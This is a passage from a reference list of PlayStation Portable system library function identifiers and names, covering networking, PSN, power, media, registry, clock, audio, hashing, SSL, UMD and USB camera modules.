sceNetAdhocctlCreate<br /> <br /> Library: sceNetApDialogDummy<br /> 0x3811281E sceNetApDialogDummyConnect<br /> 0xBB73FF67 sceNetApDialogDummyInit<br /> 0xCA9BE5BF sceNetApDialogDummyGetState<br /> 0xF213BE65 sceNetApDialogDummyTerm<br /> <br /> Library: sceNetApctl<br /> 0x24FE91A1 sceNetApctlDisconnect<br /> 0x2935C45B sceNetApctlGetBSSDescEntry2<br /> 0x2BEFDF23 sceNetApctlGetInfo<br /> 0x5963991B sceNetApctlDelHandler<br /> 0x5DEAC81B sceNetApctlGetState<br /> 0x8ABADD51 sceNetApctlAddHandler<br /> 0xA3E77E13 sceNetApctlScanSSID2<br /> 0xB3EDD0EC sceNetApctlTerm<br /> 0xCFB957C6 sceNetApctlConnect<br /> 0xE2F91F9B sceNetApctlInit<br /> 0xF25A5006 sceNetApctlGetBSSDescIDList2<br /> <br /> Library: sceNetIfhandle<br /> 0xC80181A2 sceNetGetDropRate<br /> 0xFD8585E1 sceNetSetDropRate<br /> <br /> Library: sceNetInet<br /> 0x05038FC7 sceNetInetSendto<br /> 0x162E6FD5 sceNetInetGetsockname<br /> 0x17943399 sceNetInetInit<br /> 0x1A33F9AE sceNetInetBind<br /> 0x1BDF5D13 sceNetInetInetAton<br /> 0x2FE71FE7 sceNetInetSetsockopt<br /> 0x39B0C7D3 sceNetInetGetUdpcbstat<br /> 0x410B34AA sceNetInetConnect<br /> 0x4A114C7C sceNetInetGetsockopt<br /> 0x4CFE4E56 sceNetInetShutdown<br /> 0x5BE8D595 sceNetInetSelect<br /> 0x774E36F4 sceNetInetSendmsg<br /> 0x7AA671BC sceNetInetSend<br /> 0x805502DD sceNetInetCloseWithRST<br /> 0x80A21ABD sceNetInetSocketAbort<br /> 0x8B7B220F sceNetInetSocket<br /> 0x8CA3A97E sceNetInetGetPspError<br /> 0x8D7284EA sceNetInetClose<br /> 0xA9ED66B9 sceNetInetTerm<br /> 0xB3888AD4 sceNetInetGetTcpcbstat<br /> 0xB75D5B0A sceNetInetInetAddr<br /> 0xC91142E4 sceNetInetRecvfrom<br /> 0xCDA85C99 sceNetInetRecv<br /> 0xD0792666 sceNetInetInetNtop<br /> 0xD10A1A7A sceNetInetListen<br /> 0xDB094E1B sceNetInetAccept<br /> 0xE247B6D6 sceNetInetGetpeername<br /> 0xE30B8C19 sceNetInetInetPton<br /> 0xEECE61D2 sceNetInetRecvmsg<br /> 0xFAABB1DD sceNetInetPoll<br /> 0xFBABE411 sceNetInetGetErrno<br /> <br /> Library: sceNetResolver<br /> 0x12748EB9 sceNetResolverWaitAsync<br /> 0x14C17EF9 sceNetResolverStartNtoAAsync<br /> 0x224C5F44 sceNetResolverStartNtoA<br /> 0x244172AF sceNetResolverCreate<br /> 0x4EE99358 sceNetResolverPollAsync<br /> 0x6138194A sceNetResolverTerm<br /> 0x629E2FB7 sceNetResolverStartAtoN<br /> 0x808F6063 sceNetResolverStop<br /> 0x94523E09 sceNetResolverDelete<br /> 0xAAC09184 sceNetResolverStartAtoNAsync<br /> 0xF3370E61 sceNetResolverInit<br /> <br /> Library: sceNetUpnp<br /> 0x27045362 sceNetUpnpGetNatInfo<br /> 0x3432B2E5 sceNetUpnpStart<br /> 0x3E32ED9E sceNetUpnpStop<br /> 0x540491EF sceNetUpnpTerm<br /> 0xE24220B5 sceNetUpnpInit<br /> <br /> Library: sceNp<br /> 0x1D60AE4B sceNpGetChatRestrictionFlag<br /> 0x37E1E274 sceNpTerm<br /> 0x4B5C71C8 sceNpGetOnlineId<br /> 0x633B5F71 sceNpGetNpId<br /> 0x7E0864DF sceNpGetUserProfile<br /> 0x857B47D3 sceNpInit<br /> 0xA0BE3C4B sceNpGetAccountRegion<br /> 0xBB069A87 sceNpGetContentRatingFlag<br /> 0xCDCC21D3 sceNpGetMyLanguages<br /> <br /> Library: sceNpAuth<br /> 0x3F1C1F70 sceNpAuthGetTicket<br /> 0x4EC1F667 sceNpAuthTerm<br /> 0x5A3CB57A sceNpAuthGetTicketParam<br /> 0x6900F084 sceNpAuthGetEntitlementById<br /> 0x72BB0467 sceNpAuthDestroyRequest<br /> 0x75FB0AE3 sceNpAuthGetEntitlementIdList<br /> 0xA1DE86F8 sceNpAuthInit<br /> 0xCD86A656 sceNpAuthCreateStartRequest<br /> 0xD99455DD sceNpAuthAbortRequest<br /> 0xF4531ADC sceNpAuthGetMemoryStat<br /> <br /> Library: sceNpCommerce2<br /> 0x005B5F20 sceNpCommerce2GetProductInfoStart<br /> 0x05E7AFBC sceNpCommerce2GetGameProductInfoFromContentInfo<br /> 0x0E9956E3 sceNpCommerce2Init<br /> 0x1888A9FE sceNpCommerce2DestroyReq<br /> 0x1C85ED88 sceNpCommerce2GetPrice<br /> 0x1C952DCB sceNpCommerce2GetGameProductInfo<br /> 0x2B25F6E9 sceNpCommerce2CreateSessionStart<br /> 0x3371D5F1 sceNpCommerce2GetProductInfoCreateReq<br /> 0x490210E0 sceNpCommerce2DestroyGetProductInfoResult<br /> 0x4ECD4503 sceNpCommerce2CreateSessionCreateReq<br /> 0x54FE8871 sceNpCommerce2GetCategoryInfo<br /> 0x57C8BD4E sceNpCommerce2GetCategoryInfoFromContentInfo<br /> 0x590A3229 sceNpCommerce2GetSessionInfo<br /> 0x5D8C2D99 sceNpCommerce2GetCategoryContentsCreateReq<br /> 0x6592FE83 sceNpCommerce2GetContentRatingDescriptor<br /> 0x6A2AE572 sceNpCommerce2GetContentRatingInfoFromGameProductInfo<br /> 0x6F1FE37F sceNpCommerce2CreateCtx<br /> 0x80A7AFDB sceNpCommerce2GetCategoryContentsGetResult<br /> 0xA5A34EA4 sceNpCommerce2Term<br /> 0xAA4A1E3D sceNpCommerce2GetProductInfoGetResult<br /> 0xB0D7AA90 sceNpCommerce2GetContentInfo<br /> 0xBC61FFC8 sceNpCommerce2CreateSessionGetResult<br /> 0xC5505A19 sceNpCommerce2GetContentRatingInfoFromCategoryInfo<br /> 0xC7F32242 sceNpCommerce2AbortReq<br /> 0xCEAB1829 sceNpCommerce2InitGetCategoryContentsResult<br /> 0xDD6758FA sceNpCommerce2GetCategoryContentsStart<br /> 0xED85ACCE sceNpCommerce2DestroyGetCategoryContentsResult<br /> 0xF2278B90 sceNpCommerce2GetGameSkuInfoFromGameProductInfo<br /> 0xF297AB9C sceNpCommerce2DestroyCtx<br /> 0xFC30C19E sceNpCommerce2InitGetProductInfoResult<br /> <br /> Library: sceNpMatching2<br /> 0x12C5A111 sceNpMatching2GetRoomDataExternalList<br /> 0x1421514B sceNpMatching2SetDefaultRoomEventOptParam<br /> 0x190FF903 sceNpMatching2ContextStart<br /> 0x22F38DAF sceNpMatching2GetMemoryStat<br /> 0x2B3892FC sceNpMatching2ContextStop<br /> 0x2E61F6E1 sceNpMatching2Init<br /> 0x3892E9A6 sceNpMatching2SignalingGetConnectionInfo<br /> 0x3DE70241 sceNpMatching2DestroyContext<br /> 0x495E97BD sceNpMatching2GrantRoomOwner<br /> 0x4EE3A8EC sceNpMatching2GetServerInfo<br /> 0x5030CC53 sceNpMatching2CreateContext<br /> 0x55F7837F sceNpMatching2SendRoomChatMessage<br /> 0x5C7DB6A4 sceNpMatching2GetRoomMemberDataInternalList<br /> 0x631682CC sceNpMatching2SetDefaultRequestOptParam<br /> 0x6D6D0C75 sceNpMatching2SignalingGetConnectionStatus<br /> 0x7BBFC427 sceNpMatching2JoinRoom<br /> 0x7D1D5F5E sceNpMatching2SetUserInfo<br /> 0x7DAA8A90 sceNpMatching2SetRoomMemberDataInternal<br /> 0x80F61558 sceNpMatching2GetRoomMemberIdListLocal<br /> 0x81C13E6D sceNpMatching2SearchRoom<br /> 0x8BF37D8C sceNpMatching2Term<br /> 0x8CD109E7 sceNpMatching2SignalingGetPeerNetInfo<br /> 0x9462C05A sceNpMatching2SignalingCancelPeerNetInfo<br /> 0x97529ECC sceNpMatching2KickoutRoomMember<br /> 0x9A67F5D0 sceNpMatching2SetSignalingOptParam<br /> 0xA3C298D1 sceNpMatching2RegisterSignalingCallback<br /> 0xA53E7C69 sceNpMatching2GetWorldInfoList<br /> 0xA5775DBF sceNpMatching2GetRoomMemberDataInternal<br /> 0xAAD0946A sceNpMatching2CreateJoinRoom<br /> 0xC7E72EC5 sceNpMatching2GetSignalingOptParamLocal<br /> 0xC870535A sceNpMatching2LeaveRoom<br /> 0xC8FC5D41 sceNpMatching2GetUserInfoList<br /> 0xD13491AB sceNpMatching2SetDefaultRoomMessageOptParam<br /> 0xD7D4AEB2 sceNpMatching2SetRoomDataExternal<br /> 0xDFEDB642 sceNpMatching2SignalingGetPeerNetInfoResult<br /> 0xE313E586 sceNpMatching2GetRoomDataInternal<br /> 0xE6C93DBD sceNpMatching2SetRoomDataInternal<br /> 0xEF683F4F sceNpMatching2GetRoomDataInternalLocal<br /> 0xF22C7ADC sceNpMatching2GetRoomMemberDataInternalLocal<br /> 0xF47342FC sceNpMatching2GetServerIdListLocal<br /> 0xF739BE92 sceNpMatching2GetRoomPasswordLocal<br /> 0xF940D9AD sceNpMatching2SendRoomMessage<br /> 0xFADBA9DB sceNpMatching2AbortRequest<br /> 0xFBF494C0 sceNpMatching2GetRoomMemberDataExternalList<br /> 0xFF32EA05 sceNpMatching2SignalingGetLocalNetInfo<br /> <br /> Library: sceNpService<br /> 0x00ACFAC3 sceNpServiceTerm<br /> 0x0F8F5821 sceNpServiceInit<br /> 0x168B8DE5 sceNpManagerSigninUpdateGetStatus<br /> 0x174D0D24 sceNpRosterDeleteBlockListEntry<br /> 0x1DA3E950 sceNpManagerSigninUpdateInitStart<br /> 0x250488F9 sceNpServiceGetMemoryStat<br /> 0x268C009D sceNpManagerSigninUpdateAbort<br /> 0x389A0D44 sceNpLookupNpId<br /> 0x4B4E4E71 sceNpLookupAbortTransaction<br /> 0x4E851B10 sceNpRosterGetFriendListEntry<br /> 0x506C318D sceNpRosterGetBlockListEntry<br /> 0x5494274B sceNpLookupCreateTransactionCtx<br /> 0x58251346 sceNpRosterGetFriendListEntryCount<br /> 0x5F5E32AF sceNpRosterAbort<br /> 0x66C64821 sceNpRosterDeleteRequest<br /> 0x72A1CE0D sceNpRosterDeleteFriendListEntry<br /> 0x75DACB57 sceNpRosterAcceptFriendListEntry<br /> 0x78802D5F sceNpManagerSigninUpdateShutdownStart<br /> 0x788F2B5E sceNpRosterAddFriendListEntry<br /> 0x90E4DB6A sceNpLookupUserProfile<br /> 0xA01443AA sceNpRosterGetBlockListEntryCount<br /> 0xA164CACC sceNpRosterGetFriendListMessage<br /> 0xA670D3A3 sceNpLookupDestroyTransactionCtx<br /> 0xBE22EEA3 sceNpRosterCreateRequest<br /> 0xC76F55ED sceNpLookupTitleSmallStorage<br /> 0xFC0BC8DB sceNpRosterAddBlockListEntry<br /> <br /> Library: sceOpenPSID<br /> 0xC69BEBCE sceOpenPSIDGetOpenPSID<br /> <br /> Library: sceP3da<br /> 0x013016F3 sceP3daBridgeCore<br /> 0x374500A5 sceP3daBridgeInit<br /> 0x43F756A2 sceP3daBridgeExit<br /> <br /> Library: sceParseHttp<br /> 0x8077A433 sceParseHttpStatusLine<br /> 0xAD7BFDEF sceParseHttpResponseHeader<br /> <br /> Library: sceParseUri<br /> 0x062BB07E sceUriUnescape<br /> 0x49E950EC sceUriEscape<br /> 0x568518C9 sceUriParse<br /> 0x7EE318AF sceUriBuild<br /> 0x8885A782 sceUriSweepPath<br /> 0x8AA55D17 sceUriMerge<br /> <br /> Library: scePower<br /> 0x04B7766E scePowerRegisterCallback<br /> 0x0AFD0D8B scePowerIsBatteryExist<br /> 0x1E490401 scePowerIsBatteryCharging<br /> 0x2085D15D scePowerGetBatteryLifePercent<br /> 0x34F9C463 scePowerGetPllClockFrequencyInt<br /> 0x469989AD scePowerSetClockFrequency<br /> 0x478FE6F5 scePowerGetBusClockFrequency<br /> 0x843FBF43 scePowerSetCpuClockFrequency<br /> 0x87440F5E scePowerIsPowerOnline<br /> 0x8EFB3FA2 scePowerGetBatteryLifeTime<br /> 0x9BADB3EB scePowerGetBusClockFrequencyFloat<br /> 0xA85880D0 scePowerCheckWlanCoexistenceClock<br /> 0xAC32C9CC scePowerRequestSuspend<br /> 0xB1A52C83 scePowerGetCpuClockFrequencyFloat<br /> 0xB8D7B3FB scePowerSetBusClockFrequency<br /> 0xBD681969 scePowerGetBusClockFrequencyInt<br /> 0xD3075926 scePowerIsLowBattery<br /> 0xDB9D28DD scePowerUnregitserCallback<br /> 0xDFA8BAF8 scePowerUnregisterCallback<br /> 0xEA382A27 scePowerGetPllClockFrequencyFloat<br /> 0xEBD177D6 scePowerSetClockFrequency350<br /> 0xEFD3C963 scePowerTick<br /> 0xFDB5BFE9 scePowerGetCpuClockFrequencyInt<br /> 0xFEE03A2F scePowerGetCpuClockFrequency<br /> <br /> Library: scePsmf<br /> 0x0BA514E5 scePsmfGetVideoInfo<br /> 0x0C120E1D scePsmfSpecifyStreamWithStreamTypeNumber<br /> 0x1E6D9013 scePsmfSpecifyStreamWithStreamType<br /> 0x2673646B scePsmfVerifyPsmf<br /> 0x28240568 scePsmfGetCurrentStreamNumber<br /> 0x40326D8F scePsmfCheckPsmfMark<br /> 0x43AC7DBB scePsmfGetPsmfMark<br /> 0x4BC9BDE0 scePsmfSpecifyStream<br /> 0x4E624A34 scePsmfGetEPWithId<br /> 0x5B70FCC1 scePsmfQueryStreamOffset<br /> 0x5F457515 scePsmfGetEPidWithTimestamp<br /> 0x68D42328 scePsmfGetNumberOfSpecificStreams<br /> 0x7491C438 scePsmfGetNumberOfEPentries<br /> 0x76D3AEBA scePsmfGetPresentationStartTime<br /> 0x7C0E7AC3 scePsmfGetEPWithTimestamp<br /> 0x8D843AB6 scePsmfGetPsmfMarkIdWithTimestamp<br /> 0x9553CC91 scePsmfQueryStreamSize<br /> 0x971A3A90 scePsmfCheckEPmap<br /> 0xA5EBFE81 scePsmfGetStreamSize<br /> 0xA83F7113 scePsmfGetAudioInfo<br /> 0xB78EB9E9 scePsmfGetHeaderSize<br /> 0xBD8AE0D8 scePsmfGetPresentationEndTime<br /> 0xC22C8327 scePsmfSetPsmf<br /> 0xC7DB3A5B scePsmfGetCurrentStreamType<br /> 0xD1DCF0DB scePsmfGetPsmfMarkWithTimestamp<br /> 0xDE78E9FC scePsmfGetNumberOfPsmfMarks<br /> 0xE1283895 scePsmfGetPsmfVersion<br /> 0xEAED89CD scePsmfGetNumberOfStreams<br /> <br /> Library: scePspNpDrm_user<br /> 0x08D98894 sceNpDrmEdataSetupKey<br /> 0x219EF5CC sceNpDrmEdataGetDataSize<br /> 0x275987D1 sceNpDrmRenameCheck<br /> 0x9B745542 sceNpDrmClearLicenseeKey<br /> 0xA1336091 sceNpDrmSetLicenseeKey<br /> <br /> Library: scePuny<br /> 0x8C2DBD4E scePunyDecodeUCS4<br /> 0x8D51155B scePunyEncodeUCS2<br /> 0xAD29F139 scePunyEncodeUCS4<br /> 0xDD0ED02A scePunyDecodeUCS2<br /> <br /> Library: sceQpCode<br /> 0x2B235B5A sceQPrintableLineDecoder<br /> 0x69752447 sceQPrintableEncoder<br /> <br /> Library: sceReg<br /> 0x0CAE832B sceRegCloseCategory<br /> 0x0D69BF40 sceRegFlushCategory<br /> 0x17768E14 sceRegSetKeyValue<br /> 0x1D8A762E sceRegOpenCategory<br /> 0x28A8E98A sceRegGetKeyValue<br /> 0x2C0DB9DD sceRegGetKeysNum<br /> 0x2D211135 sceRegGetKeys<br /> 0x30BE0259 sceRegGetKeyValueByName<br /> 0x3615BC87 sceRegRemoveKey<br /> 0x39461B4D sceRegFlushRegistry<br /> 0x4CA16893 sceRegRemoveCategory<br /> 0x57641A81 sceRegCreateKey<br /> 0x835ECE6F sceRegGetCategoryListAtRoot<br /> 0x92E41280 sceRegOpenRegistry<br /> 0x9B25EDF1 sceRegExit<br /> 0xBE8C1263 sceRegGetCategoryNumAtRoot<br /> 0xC5768D02 sceRegGetKeyInfoByName<br /> 0xD4475AA8 sceRegGetKeyInfo<br /> 0xDEDA92BF sceRegRemoveRegistry<br /> 0xFA8A5739 sceRegCloseRegistry<br /> <br /> Library: sceRtc<br /> 0x011F03C1 sceRtcGetAccumulativeTime<br /> 0x0498FB3C sceRtcFormatRFC3339<br /> 0x05EF322C sceRtcGetDaysInMonth<br /> 0x1909C99B sceRtcSetTime64_t<br /> 0x203CEB0D sceRtcGetLastReincarnatedTime<br /> 0x26D25A5D sceRtcTickAddMicroseconds<br /> 0x26D7A24A sceRtcTickAddHours<br /> 0x27C4594C sceRtcGetTime_t<br /> 0x27F98543 sceRtcFormatRFC3339LocalTime<br /> 0x28E1E988 sceRtcParseRFC3339<br /> 0x34885E0D sceRtcConvertUtcToLocalTime<br /> 0x36075567 sceRtcGetDosTime<br /> 0x3A807CC8 sceRtcSetTime_t<br /> 0x3F7AD767 sceRtcGetCurrentTick<br /> 0x42307A17 sceRtcIsLeapYear<br /> 0x42842C77 sceRtcTickAddYears<br /> 0x44F45E05 sceRtcTickAddTicks<br /> 0x4B1B5E82 sceRtcCheckValid<br /> 0x4CFA57B0 sceRtcGetCurrentClock<br /> 0x57726BC1 sceRtcGetDayOfWeek<br /> 0x62685E98 sceRtcGetLastAdjustedTime<br /> 0x6A676D2D sceRtcUnregisterCallback<br /> 0x6FF40ACC sceRtcGetTick<br /> 0x779242A2 sceRtcConvertLocalTimeToUTC<br /> 0x7ACE4C04 sceRtcSetWin32FileTime<br /> 0x7D1FBED3 sceRtcSetAlarmTick<br /> 0x7DE6711B sceRtcFormatRFC2822LocalTime<br /> 0x7ED29E40 sceRtcSetTick<br /> 0x81FCDA34 sceRtcIsAlarmed<br /> 0x9ED0AE87 sceRtcCompareTick<br /> 0xC2DDBEB5 sceRtcGetAlarmTick<br /> 0xC41C2853 sceRtcGetTickResolution<br /> 0xC663B3B9 sceRtcFormatRFC2822<br /> 0xCF3A2CA8 sceRtcTickAddWeeks<br /> 0xCF561893 sceRtcGetWin32FileTime<br /> 0xDBF74F1B sceRtcTickAddMonths<br /> 0xDFBC5F16 sceRtcParseDateTime<br /> 0xE1C93E47 sceRtcGetTime64_t<br /> 0xE51B4B7A sceRtcTickAddDays<br /> 0xE6605BCA sceRtcTickAddMinutes<br /> 0xE7C27D1B sceRtcGetCurrentClockLocalTime<br /> 0xF006F264 sceRtcSetDosTime<br /> 0xF2A4AFE5 sceRtcTickAddSeconds<br /> 0xF5FCC995 sceRtcGetCurrentNetworkTick<br /> 0xFB3B18CD sceRtcRegisterCallback<br /> <br /> Library: sceSasCore<br /> 0x019B25EB sceSasSetADSR<br /> 0x07F58C24 sceSasGetAllEnvelopeHeights<br /> 0x267A6DD2 sceSasRevParam<br /> 0x2C8E6AB3 sceSasGetPauseFlag<br /> 0x33D4AB37 sceSasRevType<br /> 0x42778A9F sceSasInit<br /> 0x440CA7D8 sceSasSetVolume<br /> 0x4AA9EAD6 sceSasSetVoiceATRAC3<br /> 0x50A14DFC sceSasCoreWithMix<br /> 0x5F9529F6 sceSasSetSL<br /> 0x68A46B95 sceSasGetEndFlag<br /> 0x7497EA85 sceSasConcatenateATRAC3<br /> 0x74AE582A sceSasGetEnvelopeHeight<br /> 0x76F01ACA sceSasSetKeyOn<br /> 0x787D04D5 sceSasSetPause<br /> 0x99944089 sceSasSetVoice<br /> 0x9EC3676A sceSasSetADSRmode<br /> 0xA0CF2FA4 sceSasSetKeyOff<br /> 0xA232CBE6 sceSasSetTrianglarWave<br /> 0xA3589D81 sceSasCore<br /> 0xAD84D37F sceSasSetPitch<br /> 0xB7660A23 sceSasSetNoise<br /> 0xBD11B7C2 sceSasGetGrain<br /> 0xCBCD4F79 sceSasSetSimpleADSR<br /> 0xD1E0A01E sceSasSetGrain<br /> 0xD5A229C9 sceSasRevEVOL<br /> 0xD5EBBBCD sceSasSetSteepWave<br /> 0xE175EF66 sceSasGetOutputmode<br /> 0xE1CD9561 sceSasSetVoicePCM<br /> 0xE855BF76 sceSasSetOutputmode<br /> 0xF6107F00 sceSasUnsetATRAC3<br /> 0xF983B186 sceSasRevVON<br /> <br /> Library: sceSfmt11213<br /> 0x16B09B57 sceSfmt11213InitByArray<br /> 0x25238DDF sceSfmt11213GenRand64<br /> 0x7FCCAD30 sceSfmt11213FillArray32<br /> 0x8F52D18C sceSfmt11213GenRand32<br /> 0x9D45E91D sceSfmt11213InitGenRand<br /> 0xE9A29DEC sceSfmt11213FillArray64<br /> <br /> Library: sceSfmt1279<br /> 0x1F2CC3CC sceSfmt1279InitByArray<br /> 0x378C276E sceSfmt1279FillArray64<br /> 0x64117FA3 sceSfmt1279InitGenRand<br /> 0x7B9E67AB sceSfmt1279GenRand64<br /> 0xEDF8B8C3 sceSfmt1279FillArray32<br /> 0xFE9D3FEF sceSfmt1279GenRand32<br /> <br /> Library: sceSfmt132049<br /> 0x0270B0EF sceSfmt132049FillArray32<br /> 0x116EDAFB sceSfmt132049GenRand32<br /> 0xC90266E0 sceSfmt132049InitByArray<br /> 0xE0F9E926 sceSfmt132049InitGenRand<br /> 0xE4D856E3 sceSfmt132049GenRand64<br /> 0xE90C5D00 sceSfmt132049FillArray64<br /> <br /> Library: sceSfmt19937<br /> 0x161ACEB2 sceSfmt19937InitGenRand<br /> 0xB33FE749 sceSfmt19937GenRand32<br /> 0xD5AC9F99 sceSfmt19937GenRand64<br /> 0xDB025BFA sceSfmt19937FillArray32<br /> 0xDD5A5D6C sceSfmt19937InitByArray<br /> 0xEE2938C4 sceSfmt19937FillArray64<br /> <br /> Library: sceSfmt216091<br /> 0x353660FC sceSfmt216091InitByArray<br /> 0x3A0F900B sceSfmt216091FillArray32<br /> 0x5E2F99CE sceSfmt216091GenRand64<br /> 0xBFA431A4 sceSfmt216091FillArray64<br /> 0xC0E3B92F sceSfmt216091InitGenRand<br /> 0xC81A470C sceSfmt216091GenRand32<br /> <br /> Library: sceSfmt2281<br /> 0x8454D15E sceSfmt2281FillArray64<br /> 0x868C53AB sceSfmt2281InitGenRand<br /> 0x9D9120D6 sceSfmt2281FillArray32<br /> 0xBBCDB82B sceSfmt2281GenRand64<br /> 0xDEE53F2E sceSfmt2281GenRand32<br /> 0xF38FF54A sceSfmt2281InitByArray<br /> <br /> Library: sceSfmt4253<br /> 0x2AF9B5D3 sceSfmt4253GenRand64<br /> 0x61B05CA7 sceSfmt4253FillArray32<br /> 0x79D2E875 sceSfmt4253FillArray64<br /> 0x7F56FA88 sceSfmt4253InitGenRand<br /> 0xFA39B7A4 sceSfmt4253InitByArray<br /> 0xFBFCDAFD sceSfmt4253GenRand32<br /> <br /> Library: sceSfmt44497<br /> 0x31B1F41F sceSfmt44497GenRand32<br /> 0x4525C4FD sceSfmt44497GenRand64<br /> 0xA4168CB6 sceSfmt44497InitGenRand<br /> 0xB56C5830 sceSfmt44497InitByArray<br /> 0xCA9560E2 sceSfmt44497FillArray64<br /> 0xDCD09960 sceSfmt44497FillArray32<br /> <br /> Library: sceSfmt607<br /> 0x1CCCC776 sceSfmt607GenRand64<br /> 0x4ED95A1E sceSfmt607FillArray64<br /> 0x9480A1E6 sceSfmt607InitGenRand<br /> 0xB014F0A8 sceSfmt607InitByArray<br /> 0xCE73E1B9 sceSfmt607GenRand32<br /> 0xFA3CB3A5 sceSfmt607FillArray32<br /> <br /> Library: sceSfmt86243<br /> 0x2A0AFFB3 sceSfmt86243FillArray64<br /> 0x79A146E0 sceSfmt86243InitByArray<br /> 0x8CC70361 sceSfmt86243FillArray32<br /> 0xD5B8D7A2 sceSfmt86243GenRand32<br /> 0xDD4196A3 sceSfmt86243InitGenRand<br /> 0xF77D68EF sceSfmt86243GenRand64<br /> <br /> Library: sceSha0<br /> 0x86E64331 sceSha0BlockResult<br /> 0x91524E96 sceSha0BlockUpdate<br /> 0x931612A8 sceSha0Digest<br /> 0xEE071A21 sceSha0BlockInit<br /> <br /> Library: sceSha1<br /> 0x4A80340A sceSha1BlockInit<br /> 0x5AF85569 sceSha1BlockUpdate<br /> 0x78EDE680 sceSha1BlockResult<br /> 0xB94ACDAE sceSha1Digest<br /> <br /> Library: sceSha224<br /> 0x3A96138F sceSha224BlockInit<br /> 0x5BE354EA sceSha224Digest<br /> 0xD6A3ADCB sceSha224BlockResult<br /> 0xEF597FC7 sceSha224BlockUpdate<br /> <br /> Library: sceSha256<br /> 0x318A350C sceSha256Digest<br /> 0x5368F1BC sceSha256BlockInit<br /> 0x7310DDCF sceSha256BlockUpdate<br /> 0x82C67FB3 sceSha256BlockResult<br /> <br /> Library: sceSha384<br /> 0x139319AF sceSha384BlockInit<br /> 0x9CC3A3A2 sceSha384BlockUpdate<br /> 0xD7DF2B41 sceSha384Digest<br /> 0xD9E51292 sceSha384BlockResult<br /> <br /> Library: sceSha512<br /> 0x16ED8DC6 sceSha512BlockInit<br /> 0x5AFE898D sceSha512Digest<br /> 0x8208F538 sceSha512BlockUpdate<br /> 0xAAB6221E sceSha512BlockResult<br /> <br /> Library: sceSsl<br /> 0x058D21C0 sceSslGetNameEntryCount<br /> 0x0EB43B06 sceSslGetUsedMemoryCurrent<br /> 0x17A10DCC sceSslGetNotBefore<br /> 0x191CDEFF sceSslEnd<br /> 0x1B7C8191 sceSslGetIssuerName<br /> 0x3DD5E023 sceSslGetSubjectName<br /> 0x5BFB6B61 sceSslGetNotAfter<br /> 0x957ECBE2 sceSslInit<br /> 0xB99EDE6A sceSslGetUsedMemoryMax<br /> 0xCC0919B0 sceSslGetSerialNumber<br /> 0xD6D097B4 sceSslGetNameEntryInfo<br /> 0xF57765D3 sceSslGetKeyUsage<br /> <br /> Library: sceSuspendForUser<br /> 0x090CCB3F sceKernelPowerTick<br /> 0x3AEE7261 sceKernelPowerUnlock<br /> 0x3E0271D3 sceKernelVolatileMemLock<br /> 0xA14F40B2 sceKernelVolatileMemTryLock<br /> 0xA569E425 sceKernelVolatileMemUnlock<br /> 0xEADB1BD7 sceKernelPowerLock<br /> <br /> Library: sceUmdUser<br /> 0x14C6C45C sceUmdUnuseUMDInMsUsbWlan<br /> 0x20628E6F sceUmdGetErrorStat<br /> 0x340B7686 sceUmdGetDiscInfo<br /> 0x46EBB729 sceUmdCheckMedium<br /> 0x4A9E5E29 sceUmdWaitDriveStatCB<br /> 0x56202973 sceUmdWaitDriveStatWithTimer<br /> 0x6AF9B50A sceUmdCancelWaitDriveStat<br /> 0x6B4A146C sceUmdGetDriveStat<br /> 0x87533940 sceUmdReplaceProhibit<br /> 0x8EF08FCE sceUmdWaitDriveStat<br /> 0xAEE7404D sceUmdRegisterUMDCallBack<br /> 0xB103FA38 sceUmdUseUMDInMsUsbWlan<br /> 0xBD2BDE07 sceUmdUnRegisterUMDCallBack<br /> 0xC6183D47 sceUmdActivate<br /> 0xCBE9F02A sceUmdReplacePermit<br /> 0xE83742BA sceUmdDeactivate<br /> <br /> Library: sceUsb<br /> 0x112CC951 sceUsbGetDrvState<br /> 0x1C360735 sceUsbWaitCancel<br /> 0x4E537366 sceUsbGetDrvList<br /> 0x586DB82C sceUsbActivate<br /> 0x5BE0E002 sceUsbWaitState<br /> 0x616F2B61 sceUsbWaitStateCB<br /> 0xAE5DE6AF sceUsbStart<br /> 0xC21645A4 sceUsbGetState<br /> 0xC2464FA0 sceUsbStop<br /> 0xC572A9C8 sceUsbDeactivate<br /> <br /> Library: sceUsbAcc<br /> 0x0CD7D4AA sceUsbAccGetInfo<br /> 0x79A1C743 sceUsbAccGetAuthStat<br /> <br /> Library: sceUsbCam<br /> 0x03ED7A82 sceUsbCamSetupMic<br /> 0x08AEE98A sceUsbCamSetMicGain<br /> 0x09C26C7E sceUsbCamSetContrast<br /> 0x11A1F128 sceUsbCamGetAutoImageReverseState<br /> 0x17F7B2FB sceUsbCamSetupVideo<br /> 0x1A46CFE7 sceUsbCamStillPollInputEnd<br /> 0x1D686870 sceUsbCamSetEvLevel<br /> 0x2BCD50C0 sceUsbCamGetEvLevel<br /> 0x36636925 sceUsbCamReadMicBlocking<br /> 0x383E9FA8 sceUsbCamGetSaturation<br /> 0x3DC0088E sceUsbCamReadMic<br /> 0x3F0CF289 sceUsbCamSetupStill<br /> 0x41E73E95 sceUsbCamPollReadVideoFrameEnd<br /> 0x41EE8797 sceUsbCamUnregisterLensRotationCallback<br /> 0x4C34F553 sceUsbCamGetLensDirection<br /> 0x4F3D84D5 sceUsbCamSetBrightness<br /> 0x5145868A sceUsbCamStopMic<br /> 0x574A8C3F sceUsbCamStartVideo<br /> 0x5778B452 sceUsbCamGetMicDataLength<br /> 0x61BE5CAC sceUsbCamStillInputBlocking<br /> 0x622F83CC sceUsbCamSetSharpness<br /> 0x6784E6A8 sceUsbCamSetAntiFlicker<br /> 0x6CF32CB9 sceUsbCamStopVideo<br /> 0x6E205974 sceUsbCamSetSaturation<br /> 0x70F522C5 sceUsbCamGetBrightness<br /> 0x7563AFA1 sceUsbCamStillWaitInputEnd<br /> 0x7DAC0C71 sceUsbCamReadVideoFrameBlocking<br /> 0x82A64030 sceUsbCamStartMic<br /> 0x951BEDF5 sceUsbCamSetReverseMode<br /> 0x994471E0 sceUsbCamGetImageEffectMode<br /> 0x99D86281 sceUsbCamReadVideoFrame<br /> 0x9E8AAF8D sceUsbCamGetZoom<br /> 0xA063A957 sceUsbCamGetContrast<br /> 0xA720937C sceUsbCamStillCancelInput<br /> 0xAA7D94BA sceUsbCamGetAntiFlicker<br /> 0xB048A67D sceUsbCamWaitReadMicEnd<br /> 0xC484901F sceUsbCamSetZoom<br /> 0xD293A100 sceUsbCamRegisterLensRotationCallback<br /> 0xD4876173 sceUsbCamSetImageEffectMode<br /> 0xD5279339 sceUsbCamGetReverseMode<br /> 0xDF9D0C92 sceUsbCamGetReadVideoFrameSize<br /> 0xE5959C36 